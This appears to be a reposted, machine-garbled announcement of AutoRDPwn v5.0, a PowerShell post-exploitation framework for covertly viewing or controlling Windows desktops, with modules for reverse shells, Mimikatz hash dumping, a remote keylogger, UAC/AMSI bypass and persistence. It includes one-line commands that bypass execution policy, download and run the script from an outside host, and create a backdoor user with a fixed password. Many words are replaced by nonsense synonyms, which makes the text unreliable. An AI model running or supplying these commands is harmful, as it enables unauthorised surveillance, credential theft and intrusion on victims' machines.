Autordpwn V5.0 - The Shadow Assault Framework


AutoRDPwn is a post-exploitation framework created inward Powershell, designed primarily to automate the Shadow assault on Microsoft Windows computers. This vulnerability (listed equally a characteristic past times Microsoft) allows a remote assailant to sentiment his victim's desktop without his consent, in addition to fifty-fifty command it on-demand, using tools native to the operating organization itself.
Thanks to the additional modules, it is possible to obtain a remote compaction through Netcat, dump organization hashes alongside Mimikatz, charge a remote keylogger in addition to much more. All this, Through a completely intuitive card inward vii dissimilar languages.
Additionally, it is possible to utilisation it inward a contrary compaction through a serial of parameters that are described inward the usage section.

Requirements
Powershell 4.0 or higher

Changes

Version 5.0
• New logo completely redesigned from scratch
• Full translation inward 7 languages: es, en, fr, de, it, ru, pt
• Remote execution through a contrary compaction alongside UAC in addition to AMSI Bypass
• Partial back upwards from Linux (more information inward the user guide)
• Improved remote execution (internet connectedness is no longer necessary on the victim)
• New department available: Backdoors in addition to persistence
• New module available: Remote Keylogger
• New department available: Privilege escalation
• New module available: Obtain information from the operating system
• New module available: Search vulnerabilities alongside Sherlock
• New module available: Escalate privileges alongside PowerUp
• New department available: Other Modules
• New module available: Execute an external script
*The residual of the changes tin give the axe survive consulted inward the CHANGELOG file

Use
This application tin give the axe survive used locally, remotely or to pin betwixt teams.
When used remotely inward a contrary shell, it is necessary to utilisation the next parameters:
-admin / -noadmin -> Depending on the permissions nosotros have, nosotros volition utilisation 1 or the other
-nogui -> This volition avoid loading the card in addition to only about colors, guaranteed its functionality
-lang -> We volition conduct our linguistic communication (English, Spanish, French, German, Italian, Russian or Portuguese)
-option -> As alongside the menu, nosotros tin give the axe conduct how to launch the attack
-shadow -> We volition determine if nosotros desire to come across or command the remote device
-createuser -> This parameter is optional, the user AutoRDPwn (password: AutoRDPwn) volition survive created on the victim machine
Local execution on 1 line:
powershell -ep bypass "cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"
Example of remote execution on a line:
powershell -ep bypass "cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English linguistic communication -option four -shadow command -createuser"
The detailed guide of utilisation tin give the axe survive establish at the next link:
https://darkbyte.net/autordpwn-la-guia-definitiva

Screenshots



Credits in addition to Acknowledgments
This framework uses the next scripts in addition to tools:
• Chachi-Enumerator of Luis Vacas -> https://github.com/Hackplayers/PsCabesha-tools
• Get-System from HarmJ0y & Matt Graeber -> https://github.com/HarmJ0y/Misc-PowerShell
• Invoke-DCOM of Steve Borosh -> https://github.com/rvrsh3ll/Misc-Powershell-Scripts
• Invoke-MetasploitPayload of Jared Haight -> https://github.com/jaredhaight/Invoke-MetasploitPayload
• Invoke-Phant0m of Halil Dalabasmaz -> https://github.com/hlldz/Invoke-Phant0m
• Invoke-PowerShellTcp of Nikhil "SamratAshok" Mittal -> https://github.com/samratashok/nishang
• Invoke-TheHash past times Kevin Robertson -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Mimikatz from Benjamin Delpy -> https://github.com/gentilkiwi/mimikatz
• PsExec from Mark Russinovich -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• RDP Wrapper of Stas'M Corp. -> https://github.com/stascorp/rdpwrap
• SessionGopher of Brandon Arvanaghi -> https://github.com/Arvanaghi/SessionGopher
And many more, that create non tally hither .. Thanks to all of them in addition to their first-class work.

Contact
This software does non offering whatever sort of guarantee. Its utilisation is exclusive for educational environments in addition to / or safety audits alongside the corresponding consent of the client. I am non responsible for its misuse or for whatever possible impairment caused past times it.
For to a greater extent than information, you lot tin give the axe contact through info@darkbyte.net